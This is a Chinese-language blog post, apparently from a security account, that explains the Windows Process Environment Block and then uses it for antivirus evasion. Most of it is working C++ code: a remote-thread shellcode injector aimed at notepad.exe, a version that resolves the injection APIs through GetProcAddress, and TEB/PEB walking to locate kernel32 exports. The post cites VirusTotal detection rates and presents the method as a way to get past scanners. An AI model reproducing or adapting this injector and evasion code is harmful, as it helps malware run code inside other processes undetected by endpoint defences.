文章前先给各位师傅拜个早年啦,要过年了,公众号也会停更一段时间,年后回复啦。这篇文章中,我们将介绍如何来隐藏你程序的PEB信息。首先先来了解一下什么是PEB,其全程为Process Envirorment Block ,直译过来就是进程环境信息块,存放进程信息,每个进程都有自己的PEB信息。位于用户地址空间。其结构如下:
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID Reserved4[3];
PVOID AtlThunkSListPtr;
PVOID Reserved5;
ULONG Reserved6;
PVOID Reserved7;
ULONG Reserved8;
ULONG AtlThunkSListPtr32;
PVOID Reserved9[45];
BYTE Reserved10[96];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved11[128];
PVOID Reserved12[1];
ULONG SessionId;
} PEB, *PPEB;
具体结构可以参考下图:
在windbg中可以使用来进行查看
!peb
下面我们来看如何简单的进行PEB信息的隐藏,我们先来简单的写一个远程线程注入的例子。
#include<Windows.h>
#include<iostream>
#include<TlHelp32.h>
int find_process(const wchar_t* process_name) {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
int returnValue = 0;
if (!Process32First(snapshot, &entry)) {
goto cleanup;
}
do {
if (wcscmp(entry.szExeFile, process_name) == 0) {
returnValue = entry.th32ProcessID;
goto cleanup;
}
} while (Process32Next(snapshot, &entry));
cleanup:
CloseHandle(snapshot);
return returnValue;
}
unsigned char shellcode[] ="\x00";
int main(int argc, char* argv[])
{
HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, true, find_process(L"notepad.exe"));
LPVOID targetPage = VirtualAllocEx(hTargetProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hTargetProcess, targetPage, shellcode, sizeof(shellcode), NULL);
DWORD ignored;
CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetPage, NULL, 0, &ignored);
return EXIT_SUCCESS;
}
其API调用链主要有下面两条,
查找进程PID:
CreateToolhelp32Snapshot --> Process32First --> Process32Next
创建线程:
OpenProcess --> VirtualAllocEx --> WriteProcessMemory --> CreateRemoteThread
经常写代码的都知道,这些都是一些敏感API,被监控的死死的。
VT上也有类似的功能:
查杀率:
解决方法1 GetProcAddress
函数功能描述:GetProcAddress函数检索指定的动态链接库(DLL)中的输出库函数地址。重明中也已利用该技术。
函数原型:
FARPROC GetProcAddress(
HMODULE hModule, // DLL模块句柄
LPCSTR lpProcName // 函数名
);
以CreateToolhelp32Snapshot为例,改成GetProcAddress的调用方法,则变成下面这样:
HMODULE Kernels32 = GetModuleHandleA("kernel32.dll");
using CreateToolhelp32Snapshots = HANDLE(WINAPI*)(DWORD,DWORD);
CreateToolhelp32Snapshots CreateToolhelp32Snapshot = (CreateToolhelp32Snapshots)GetProcAddress(Kernels32,"CreateToolhelp32Snapshot");
以此类推,最后的代码如下:
#include<Windows.h>
#include<iostream>
#include<TlHelp32.h>
using namespace std;
unsigned char shellcode[] ="\x00";
HMODULE Kernels32 = GetModuleHandleA("kernel32.dll");
int find_process(const wchar_t* process_name) {
using CreateToolhelp32Snapshots = HANDLE(WINAPI*)(DWORD,DWORD);
CreateToolhelp32Snapshots CreateToolhelp32Snapshot = (CreateToolhelp32Snapshots)GetProcAddress(Kernels32,"CreateToolhelp32Snapshot");
using Process32Firsts = BOOL(WINAPI*)(HANDLE,LPPROCESSENTRY32);
Process32Firsts Process32First = (Process32Firsts)GetProcAddress(Kernels32,"Process32First");
using Process32Nexts = Process32Firsts;
Process32Nexts Process32Next = (Process32Nexts)GetProcAddress(Kernels32,"Process32Next");
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
int returnValue = 0;
if (!Process32First(snapshot, &entry)) {
goto cleanup;
}
do {
if (wcscmp(entry.szExeFile, process_name) == 0) {
returnValue = entry.th32ProcessID;
goto cleanup;
}
} while (Process32Next(snapshot, &entry));
cleanup:
CloseHandle(snapshot);
return returnValue;
}
int main(int argc, char* argv[])
{
using OpenProcessPrototype = HANDLE(WINAPI*)(DWORD, BOOL, DWORD);
OpenProcessPrototype OpenProcess = (OpenProcessPrototype)GetProcAddress(Kernels32, "OpenProcess");
using VirtualAllocExPrototype = LPVOID(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
VirtualAllocExPrototype VirtualAllocEx = (VirtualAllocExPrototype)GetProcAddress(Kernels32, "VirtualAllocEx");
using WriteProcessMemoryPrototype = BOOL(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
WriteProcessMemoryPrototype WriteProcessMemory = (WriteProcessMemoryPrototype)GetProcAddress(Kernels32, "WriteProcessMemory");
using CreateRemoteThreadPrototype = HANDLE(WINAPI*)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
CreateRemoteThreadPrototype CreateRemoteThread = (CreateRemoteThreadPrototype)GetProcAddress(Kernels32, "CreateRemoteThread");
HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, true, find_process(L"notepad.exe"));
LPVOID targetPage = VirtualAllocEx(hTargetProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hTargetProcess, targetPage, shellcode, sizeof(shellcode), NULL);
DWORD ignored;
CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetPage, NULL, 0, &ignored);
return EXIT_SUCCESS;
}
再来看一下函数情况:
在不考虑shellcode的情况下的免杀效果:
解决方法2 从PEB下手
因为我们知道,PEB是内存中的一个结构,其中也包含了DLL以及他们所在的内存中的位置。,所以我们的思路如下:
遍历PEB,然后从PEB中找到kernel32的地址。找到后,遍历其导出表找到我们需要的函数名称。
其查找地址的方法可以参考下面的代码:
#include <winnt.h>
#include <winternl.h>
// Thread Environment Block (TEB)
#if defined(_M_X64) // x64
PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
#else // x86
PTEB tebPtr = reinterpret_cast<PTEB>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
#endif
// Process Environment Block (PEB)
PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;
最终效果如下:
此时我们便可以使用上面的方法继续, 最后的结果:
注:该方法笔者已使用了很长时间,效果不错,重明工具中也有相关利用,文章截图皆为最新测试截图,该方法无法清除程序中的字符,如果需要可自行更改。
参考文章:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa813706(v=vs.85).aspx
https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
https://stackoverflow.com/questions/12199796/converting-unicodestring-to-char https://stackoverflow.com/questions/37288289/how-to-get-the-process-environment-block-peb-address-using-assembler-x64-os